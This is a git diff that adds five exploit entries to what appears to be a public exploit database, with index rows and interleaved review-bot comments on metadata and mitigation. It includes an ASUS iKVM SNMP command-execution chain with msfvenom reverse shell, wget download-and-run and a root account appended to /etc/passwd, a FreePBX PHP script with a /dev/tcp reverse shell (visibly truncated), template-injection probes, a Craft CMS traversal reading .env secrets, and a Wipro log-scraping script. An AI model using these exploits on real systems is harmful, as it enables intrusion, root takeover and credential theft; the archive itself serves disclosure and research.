diff --git a/exploits/hardware/remote/52033.txt b/exploits/hardware/remote/52033.txt new file mode 100644 index 000000000..e683aea13 --- /dev/null +++ b/exploits/hardware/remote/52033.txt 
@@ -0,0 +1,61 @@ +# Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access +# Date: 2023-02-16 +# Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023] +# Vendor Homepage: https://servers.asus.com/search?q=ASMB8 +# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others) +# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl +# CVE: CVE-2023-26602 + +++++++++++++++++++++ +0x00 DESCRIPTION +++++++++++++++++++++ +During a recent engagement, a remote server management interface has been +discovered. Furthermore, SNMPv2 was found to be enabled, offering write +access to the private community, subsequently allowing us to introduce +SNMP arbitrary extensions to achieve RCE. +We also found a hardcoded account sysadmin:superuser by cracking the +shadow file (md5crypt) found on the system and identifed an "anonymous" +user w/ the same password, however a lock seems to be in place to prevent +using these credentials via SSH (running defshell as default shell). ++++++++++++++++ +0x01 IMPACT ++++++++++++++++ +By exploiting SNMP arbitrary extension, we are able to run any command on +the system w/ root privileges, and we are able to introduce our own user +circumventing the defshell restriction for SSH. ++++++++++++++++++++++++++++++++ +0x02 PROOF OF CONCEPT (PoC) ++++++++++++++++++++++++++++++++ +At first, we have to create required extensions on the system, e.g. via +snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"' +and if everything is set, we can just run that command by +snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects +which will execute our defined command and show us its output. ++++++++++++++++++++++++++++++++ +0x03 SSH Remote Root Access ++++++++++++++++++++++++++++++++ +The identified RCE can be used to transfer a reverse tcp shell created +by msfvenom for arm little-endian, e.g. 
+msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin +We can now transfer the binary, adjust permissions and finally run it: +snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"' +snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"' +snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"' +Again, we have to request execution of the lines in the MIB via: +snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects +We get a reverse connection from the host, and can now act on the local system +to easily echo our own line into /etc/passwd: +echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd +By setting the standard shell to /bin/sh, we are able to get a SSH root +shell into the system, effectively circumventing the defshell restriction. +$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g +BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash) +Enter 'help' for a list of built-in commands. +# uname -a +Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown +# uptime +15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25 +# head -n 1 /etc/shadow +sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7::: +--- +#EOF \ No newline at end of file diff --git a/exploits/php/webapps/52030.txt b/exploits/php/webapps/52030.txt new file mode 100644 index 000000000..7395aadf8 --- /dev/null +++ b/exploits/php/webapps/52030.txt 
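Review bot: The write-up ends at the proof of concept and has no remediation or detection section, so a reader learns about the hardcoded `sysadmin` account and the writable `private` SNMPv2 community but not what to change. I would add a short `0x04 MITIGATION` section after the SSH part. It should say to disable SNMPv2 or replace the default `public`/`private` communities, keep the iKVM interface on an isolated management network, and review `nsExtendObjects` and `/etc/passwd` on exposed units for entries nobody provisioned. The first `snmpbulkwalk` example also uses `x.x.x` where every other command uses `x.x.x.x`.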
@@ -0,0 +1,55 @@ +# Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection (SSTI) +# Exploit Author: tmrswrr +# Date: 30/05/2024 +# Vendor: https://akaunting.com/forum +# Software Link: https://akaunting.com/apps/crm +# Vulnerable Version(s): 3.1.8 +# Tested : https://www.softaculous.com/apps/erp/Akaunting + + +1 ) Login with admin cred and go to : Items > New Item + https://127.0.0.1/Akaunting/1/common/items +2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers +3 ) Save it +4 ) You will be see result : + 49 + + +==================================================================================== + +1 ) Login with admin cred and go to :Settings > Taxes > New Tax + https://127.0.0.1/Akaunting/1/settings/taxes/1/edit +2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers +3 ) Save it +4 ) You will be see result : + 49 + > {{'a'.toUpperCase()}} + > A + > {{'a'.concat('b')}} + > ab +==================================================================================== + + +1 ) Login with admin cred and go to : Banking > Transactions > New Income +https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income +2 ) Write SSTI payload : {{7*7}} Description field +3 ) Save it +4 ) You will be see result : + 49 + > {{'a'.toUpperCase()}} + > A + > {{'a'.concat('b')}} + > ab + +======================================================================================= + +1 ) Login with admin cred +https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit +2 ) Write SSTI payload : {{7*7}} Name field +3 ) Save it +4 ) You will be see result : + 49 + > {{'a'.toUpperCase()}} + > A + > {{'a'.concat('b')}} + > ab \ No newline at end of file diff --git a/exploits/php/webapps/52031.php b/exploits/php/webapps/52031.php new file mode 100644 index 000000000..f638d80e9 --- /dev/null +++ b/exploits/php/webapps/52031.php 
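Review bot: The title classifies this as server-side template injection, but the probes in the second to fourth sections, `{{'a'.toUpperCase()}}` giving `A` and `{{'a'.concat('b')}}` giving `ab`, are JavaScript string methods. That suggests the expression is evaluated by a client-side template in the browser rather than by the PHP backend. The distinction matters for triage: client-side evaluation is a stored script-injection issue for whoever views the record, not code execution on the server. The header should state which engine evaluates the payload and how that was confirmed, and the title and the `files_exploits.csv` description should be adjusted if it turns out to be client-side. The write-up also names only 3.1.8 and gives no fixed version.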
@@ -0,0 +1,41 @@ +# Exploit Title: FreePBX 16 - Remote Code Execution (RCE) (Authenticated) +# Exploit Author: Cold z3ro +# Date: 6/1/2024 +# Tested on: 14,15,16 +# Vendor: https://www.freepbx.org/ + +%26 /dev/tcp/'.$backconnectip.'/4444 0>%261)'); + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); + + echo $response = curl_exec($ch)."\n"; + + curl_close($ch); + +?> \ No newline at end of file diff --git a/exploits/php/webapps/52034.txt b/exploits/php/webapps/52034.txt new file mode 100644 index 000000000..cee911905 --- /dev/null +++ b/exploits/php/webapps/52034.txt 
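Review bot: The header comment gives `Tested on: 14,15,16` but names neither the affected FreePBX module or endpoint nor a CVE or fixed release, so an operator cannot tell from this file whether an installation is already patched. A `# Version:` line and a `# CVE:` or advisory reference would close that gap. Part of the script body is not visible in this view, so the request itself cannot be checked here. The header lines start with `#` ahead of the PHP code; if they sit before the opening tag, they are emitted as plain output rather than treated as comments.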
@@ -0,0 +1,111 @@ +# Exploit Title: Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated) +# Date: 2022.01.26 +# Exploit Author: Steffen Rogge +# Vendor Homepage: https://github.com/ethercreative/logs +# Software Link: https://plugins.craftcms.com/logs +# Version: <=3.0.3 +# Tested on: Linux +# CVE : CVE-2022-23409 + +product: Ethercreative Logs plugin for Craft CMS +fixed version: >=3.0.4 +impact: Medium +found: 2021-07-06 +SEC Consult Vulnerability Lab +An integrated part of SEC Consult, an Atos company +Europe | Asia | North America +https://www.sec-consult.com +======================================================================= +Vendor description: +------------------- +"A quick and dirty way to access your logs from inside the CP" +As found on the plugin store page: https://plugins.craftcms.com/logs +Active Installs 4,093 (as of 2021-07-07) +Business recommendation: +------------------------ +The vendor provides a patched version v3.0.4 which should be installed immediately. +Vulnerability overview/description: +----------------------------------- +1) Authenticated Path Traversal (CVE-2022-23409) +The plugin "Logs" provides a functionality to read log files of the Craft CMS system inside +the backend of the CMS. As the requested logfile is not properly validated, an attacker is +able to request arbitrary files from the underlying file system with the permissions of the +web service user. +Proof of concept: +----------------- +1) Authenticated Path Traversal (CVE-2022-23409) +As the plugin is installed as an administrator of the system and the function is only accessible +after being logged in as an admin, an attacker needs to be authenticated as an administrator in +the backend in order to extract the needed "{MD5}_identity" cookie for the crafted request. 
+The vulnerable endpoint is provided by the plugin under the following path: +https://vulnerablesite.com/index.php/admin/actions/logs/logs/stream +The vulnerable controller for that endpoint can be found here: +https://github.com/ethercreative/logs/blob/master/src/Controller.php +The function "actionStream()" provides an endpoint for the Craft CMS and does not validate input +values before file content is being read by the function "file_get_contents". +public function actionStream () +{ +$logsDir = \Craft::getAlias('@storage/logs'); +$logFile = \Craft::$app->request->getParam('log'); +$currentLog = \Craft::$app->request->get('log', $logFile); +$log = file_get_contents($logsDir . '/' . $currentLog); +exit($log); +} +A crafted GET parameter with the name "log" can be used to access files on the underlying filesystem +with rights as the user executing the web server. In most cases this will be the user "www-data". +In order to read the file ".env" or ".env.php" which contains the environment configuration and as +such also the database credentials, the following request can be used: +GET /admin/actions/logs/logs/stream?log=../../.env HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 +Connection: close +Cookie: 1031b8c41dfff97a311a7ac99863bdc5_identity=; +The response then discloses the file content of the file ".env": +HTTP/1.1 200 OK +Date: Thu, 07 Jul 2021 10:08:52 GMT +Server: nginx +Content-Type: text/html; charset=UTF-8 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Set-Cookie: CraftSessionId=2uisculfj8t9q1tnbiukl6ogjf; path=/; secure; HttpOnly +Content-Length: 1600 +Connection: close +[...] 
+$craftEnvVars = [ +'DB_DRIVER' => 'mysql', +'DB_SERVER' => '********', +'DB_USER' => '********', +'DB_PASSWORD' => '********', +'DB_DATABASE' => '********', +'DB_SCHEMA' => 'public', +'DB_TABLE_PREFIX' => '', +'DB_PORT' => '********', +'SECURITY_KEY' => '********', +[...] +Vulnerable / tested versions: +----------------------------- +The following version has been tested which was the latest version available at the time +of the test: +* Version 3.0.3 released on November 25, 2019 +Distributed through the Craft Plugin Store https://plugins.craftcms.com/logs +Vendor contact timeline: +------------------------ +2021-07-07: Contacting vendor through dev@ethercreative.co.uk +2021-07-08: Response from vendor, no encryption available but vendor accepted to be responsible +for any risks involved with plaintext communication +2021-07-08: Advisory was sent to vendor unencrypted +2021-07-09: Vendor released a patch for this vulnerability with version 3.0.4 +(https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4) +2021-07-12: Updated Plugin has been tested on an up-to-date CraftCMS installation +(CraftCMS 3.7.0, PHP 8, MySQL 8, Logs Plugin 3.0.4) +2022-01-24: Release of security advisory +Solution: +--------- +The vendor released a patched version 3.0.4 or higher which can be retrieved from their +website/github: +https://plugins.craftcms.com/logs +https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4 +Workaround: +----------- +Uninstall/Disable the plugin and access the Craft CMS logs via SSH or other services. \ No newline at end of file diff --git a/exploits/windows/remote/52032.py b/exploits/windows/remote/52032.py new file mode 100755 index 000000000..c7107104c --- /dev/null +++ b/exploits/windows/remote/52032.py 
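Review bot: The sample response masks the database values with `********` but still prints a `Set-Cookie: CraftSessionId=...` value, and the request shows the full hashed `..._identity` cookie name. If these came from the assessed system, they should be replaced with placeholders like the other secrets. The quoted `actionStream()` makes the root cause clear: the `log` parameter is concatenated onto `$logsDir` and passed to `file_get_contents`. A sentence in the Solution section saying what 3.0.4 validates would let readers check a vendored copy of the plugin; the linked commit is not visible here. The header `# Date: 2022.01.26` also differs from the timeline entry `2022-01-24: Release of security advisory`.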
@@ -0,0 +1,77 @@ +# Exploit Title: Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure +# Date: 09/08/2021 +# Exploit Author: Rizal Muhammed @ub3rsick +# Vendor Homepage: https://www.wipro.com/holmes/ +# Version: Wipro Holmes Orchestrator v20.4.1 +# Tested on: Windows +# CVE : CVE-2021-38283 + +import requests as rq +import argparse +import datetime +import os +from calendar import monthrange +from multiprocessing.dummy import Pool as ThreadPool +from functools import partial + +# Change if running on different port +port = 8001 +log_list = [ + "AlertService.txt", "ApprovalService.txt", "AuditService.txt", "CustomerController.txt", + "CustomerDomainCredentialService.txt", "CustomerFile.zip", "CustomerService.txt", + "DashboardController.txt", "DataParseService.txt", "DomainService.txt", "ExecutionService.txt", + "ExternalAPIService.txt", "FilesController.txt", "FormService.txt", "InfrastructureService.txt", + "ITSMConfigPrepService.txt", "LicenseService.txt", "LoginService.txt", "MailService.txt", + "MasterdataController.txt", "NetworkService.txt", "OrchestrationPreparationService.txt", + "ProblemInfrastructureService.txt", "ProcessExecutionService.txt", "ServiceRequestService.txt", + "SolutionController.txt", "SolutionLiveService.txt", "SolutionService.txt", "StorageService.txt", + "TaskService.txt", "TicketingService.txt", "UserController.txt", "UtilityService.txt" +] + +def check_month(val): + ival = int(val) + if ival > 0 and ival < 13: + return ival + else: + raise argparse.ArgumentTypeError("%s is not a valid month" % val) + +def check_year(val): + iyear = int(val) + if iyear >= 1960 and iyear <= datetime.date.today().year: + return iyear + else: + raise argparse.ArgumentTypeError("%s is not a valid year" % val) + +def do_request(target, date, log_file): + log_url = f"http://{target}/log/{date}/{log_file}" + log_name = f"{date}_{log_file}" + print(f"[*] Requesting Log: /log/{date}/{log_file}") + resp = rq.get(log_url) + if resp.status_code == 200 and not 
"Wipro Ltd." in resp.text: + print(f"[+] Success: {log_url}") + with open(f"logs/{log_name}", 'w') as lf: + lf.write(resp.text) + print(f"[*] Log File Written to ./logs/{log_name}") + +def main(): + parser = argparse.ArgumentParser(description="Wipro Holmes Orchestrator 20.4.1 Unauthenticated Log File Disclosure", + epilog="Vulnerability Discovery, PoC Author - Rizal Muhammed @ub3sick") + parser.add_argument("-t", "--target-ip", help="IP Address of the target server", required=True) + parser.add_argument("-m", "--month", help="Month of the log, (1=JAN, 2=FEB etc.)", required=True, type=check_month) + parser.add_argument("-y", "--year", help="Year of the log", required=True, type=check_year) + args = parser.parse_args() + + ndays = monthrange(args.year, args.month)[1] + date_list = [f"{datetime.date(args.year, args.month, day)}" for day in range(1, ndays + 1)] + target = f"{args.target_ip}:{port}" + + # Create folder "logs" to save log files, if it does not exist + if not os.path.exists("./logs"): + os.makedirs("./logs") + + for log_date in date_list: + for log_file in log_list: + do_request(target, log_date, log_file) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 66e01cb52..3536fa4eb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
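Review bot: `do_request` treats `resp.status_code == 200 and not "Wipro Ltd." in resp.text` as the exposure signal with no comment explaining why, and the header gives no fixed version or remediation. A one-line comment such as `# a 200 response carrying the "Wipro Ltd." string is presumably the product's own page, not a log file` (to be confirmed by the author) and a `# Fixed in:` header line would make the result interpretable for someone checking their own deployment. On style, `ThreadPool` and `partial` are imported but never used in the visible code, the membership test reads better as `"Wipro Ltd." not in resp.text`, and the `epilog` spells the handle `@ub3sick` while the header has `@ub3rsick`. For server-side log review, the requests this produces have the fixed shape `/log/<YYYY-MM-DD>/<name>` on port 8001, one per entry of `log_list` for every day of the chosen month.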
@@ -3342,6 +3342,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42726,exploits/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",remote,hardware,,2017-09-15,2017-09-15,0,CVE-2017-6315,,,,,
 36511,exploits/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 - HTML Injection",2012-12-27,"Vulnerability Research Laboratory",remote,hardware,,2012-12-27,2015-03-27,1,,,,,,https://www.securityfocus.com/bid/51301/info
 22898,exploits/hardware/remote/22898.txt,"Asus AAM6330BI/AAM6000EV ADSL Router - Information Disclosure",2003-07-14,cw,remote,hardware,,2003-07-14,2012-11-22,1,,,,,,https://www.securityfocus.com/bid/8183/info
+52033,exploits/hardware/remote/52033.txt,"ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access",2024-06-01,ub3rsick,remote,hardware,,2024-06-01,2024-06-01,0,CVE-2023-26602,,,,,
 44524,exploits/hardware/remote/44524.rb,"ASUS infosvr - Authentication Bypass Command Execution (Metasploit)",2018-04-24,Metasploit,remote,hardware,9999,2018-04-24,2018-05-02,1,CVE-2014-9583,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/37a844bef0e2fc648663d3bd15ee9101a5b4511c/modules/exploits/linux/misc/asus_infosvr_auth_bypass_exec.rb
 31033,exploits/hardware/remote/31033.py,"ASUS RT-N56U - Remote Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",remote,hardware,80,2014-01-20,2016-12-04,0,CVE-2013-6343;OSVDB-102267,,,,,
 35688,exploits/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",remote,hardware,,2015-01-04,2015-01-08,1,OSVDB-116691;CVE-2014-9583,,,,,
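Review bot: The new row for 52033 lists the author as `ub3rsick`, but `exploits/hardware/remote/52033.txt` credits `d1g@segfault.net` for NetworkSEC. The same mismatch appears in the 52034 row in the `@@ -16503` hunk, where the file names Steffen Rogge. `ub3rsick` is the author handle in 52032 only, so the value looks copied across the batch. The rows should read `...,2024-06-01,d1g,remote,hardware,...` and `...,2024-06-01,"Steffen Rogge",webapps,php,...`, with the exact spelling taken from the database's author records.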
@@ -13850,6 +13851,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3752,exploits/php/webapps/3752.txt,"AjPortal2Php - 'PagePrefix' Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",webapps,php,,2007-04-16,,1,OSVDB-37571;CVE-2007-2142;OSVDB-37570;OSVDB-37569;OSVDB-37568;OSVDB-37567;OSVDB-37566;OSVDB-37565,,,,,
 7086,exploits/php/webapps/7086.txt,"AJSquare Free Polling Script - 'DB' Multiple Vulnerabilities",2008-11-10,G4N0K,webapps,php,,2008-11-09,,1,OSVDB-57333;CVE-2008-7046;CVE-2008-7045;OSVDB-49779;CVE-2008-7044,,,,,
 2315,exploits/php/webapps/2315.txt,"Akarru 0.4.3.34 - 'bm_content' Remote File Inclusion",2006-09-06,ddoshomo,webapps,php,,2006-09-05,,1,OSVDB-28566;CVE-2006-4645,,,,,
+52030,exploits/php/webapps/52030.txt,"Akaunting 3.1.8 - Server-Side Template Injection (SSTI)",2024-06-01,tmrswrr,webapps,php,,2024-06-01,2024-06-01,0,,,,,,
 51870,exploits/php/webapps/51870.txt,"Akaunting < 3.1.3 - RCE",2024-03-10,u32i,webapps,php,,2024-03-10,2024-03-10,0,CVE-2024-22836,,,,,
 21251,exploits/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure",2012-09-11,L0n3ly-H34rT,webapps,php,,2012-09-11,2012-09-16,1,OSVDB-85488,,,,http://www.exploit-db.comakcms4.2.4.tar.gz,
 18293,exploits/php/webapps/18293.txt,"Akiva WebBoard 8.x - SQL Injection",2011-12-30,"Alexander Fuchs",webapps,php,,2011-12-30,2011-12-30,1,OSVDB-86023;CVE-2011-5204;CVE-2011-5203;OSVDB-78069,,,,,
@@ -16503,6 +16505,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46054,exploits/php/webapps/46054.txt,"Craft CMS 3.0.25 - Cross-Site Scripting",2018-12-27,"Raif Berkay Dincel",webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-20418,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comCraft-3.0.25.rar,
 46496,exploits/php/webapps/46496.txt,"Craft CMS 3.1.12 Pro - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80,2019-03-04,2019-03-04,0,CVE-2019-9554,"Cross-Site Scripting (XSS)",,,,
 51918,exploits/php/webapps/51918.py,"Craft CMS 4.4.14 - Unauthenticated Remote Code Execution",2024-03-25,"Olivier Lasne",webapps,php,,2024-03-25,2024-03-25,0,,,,,,
+52034,exploits/php/webapps/52034.txt,"Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated)",2024-06-01,ub3rsick,webapps,php,,2024-06-01,2024-06-01,0,CVE-2022-23409,,,,,
 48492,exploits/php/webapps/48492.py,"CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution",2020-05-20,"Wade Guest",webapps,php,,2020-05-20,2020-05-20,0,,,,,,
 1645,exploits/php/webapps/1645.pl,"Crafty Syntax Image Gallery 3.1g - Remote Code Execution",2006-04-04,undefined1_,webapps,php,,2006-04-03,,1,OSVDB-24387;CVE-2006-1668;OSVDB-24386;CVE-2006-1667,,,,,
 6307,exploits/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - 'department' SQL Injection",2008-08-25,"GulfTech Security",webapps,php,,2008-08-24,2018-01-05,1,OSVDB-47782;CVE-2008-3845;OSVDB-47781;GTSA-00119,,,,,http://gulftech.org/advisories/Crafty%20Syntax%20Live%20Help%20SQL%20Injection/119
@@ -18867,6 +18870,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40296,exploits/php/webapps/40296.txt,"FreePBX 13.0.35 - Remote Command Execution",2016-08-29,0x4148,webapps,php,,2016-08-29,2016-08-29,0,,,,,,
 40312,exploits/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,webapps,php,,2016-08-29,2016-08-29,0,,,,,,
 40345,exploits/php/webapps/40345.txt,"FreePBX 13.0.x < 13.0.154 - Remote Command Execution",2016-09-07,i-Hmx,webapps,php,,2016-09-07,2016-09-08,0,,,,,,
+52031,exploits/php/webapps/52031.php,"FreePBX 16 - Remote Code Execution (RCE) (Authenticated)",2024-06-01,"Cold z3ro",webapps,php,,2024-06-01,2024-06-01,0,,,,,,
 2665,exploits/php/webapps/2665.txt,"FreePBX 2.1.3 - 'upgrade.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",webapps,php,,2006-10-27,2016-10-22,1,OSVDB-34694;CVE-2006-7107,,,,http://www.exploit-db.comfreepbx-2.1.3.tgz,
 18650,exploits/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution",2012-03-23,muts,webapps,php,,2012-03-23,2021-07-29,1,OSVDB-80544;CVE-2012-4869,,,http://www.exploit-db.com/screenshots/idlt19000/elastix-root.png,,
 32214,exploits/php/webapps/32214.pl,"FreePBX 2.11.0 - Remote Command Execution",2014-03-12,@0x00string,webapps,php,80,2014-03-12,2018-04-12,1,CVE-2014-1903;OSVDB-103240,,,,,https://github.com/0x00string/oldays/blob/ace197a0a8f3c2b8111ffe55596bf1dca8a3fdd6/CVE-2014-1903.pl
@@ -45700,6 +45704,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3420,exploits/windows/remote/3420.html,"WinZip 10.0.7245 - FileView ActiveX Buffer Overflow (2)",2007-03-06,prdelka,remote,windows,,2007-03-05,,1,OSVDB-30432;CVE-2006-3890,,,,,
 2785,exploits/windows/remote/2785.c,"WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow",2006-11-15,prdelka,remote,windows,,2006-11-14,2016-09-14,1,CVE-2006-6884,,,,http://www.exploit-db.comwinzip110.exe,
 16607,exploits/windows/remote/16607.rb,"WinZip FileView - 'WZFILEVIEW.FileViewCtrl.61' ActiveX Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,,2010-04-30,2011-03-10,1,CVE-2006-5198;OSVDB-30433,"Metasploit Framework (MSF)",,,,
+52032,exploits/windows/remote/52032.py,"Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure",2024-06-01,ub3rsick,remote,windows,,2024-06-01,2024-06-01,0,CVE-2021-38283,,,,,
 18125,exploits/windows/remote/18125.rb,"Wireshark - console.lua pre-loading (Metasploit)",2011-11-19,Metasploit,remote,windows,,2011-11-19,2011-11-19,1,CVE-2011-3360;OSVDB-75347,"Metasploit Framework (MSF)",,,,http://technet.microsoft.com/en-us/security/advisory/2269637
 11453,exploits/windows/remote/11453.py,"Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow",2010-02-15,"Nullthreat & Pure|Hate",remote,windows,,2010-02-14,2010-09-05,1,,,,http://www.exploit-db.com/screenshots/idlt11500/wire-poc.png,http://www.exploit-db.comwireshark-win32-1.2.5.exe,
 17195,exploits/windows/remote/17195.rb,"Wireshark 1.4.4 - 'packet-dect.c' Remote Stack Buffer Overflow (Metasploit) (2)",2011-04-19,Metasploit,remote,windows,,2011-04-21,2011-04-21,1,CVE-2011-1591;OSVDB-71848,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwireshark-win32-1.4.1.exe,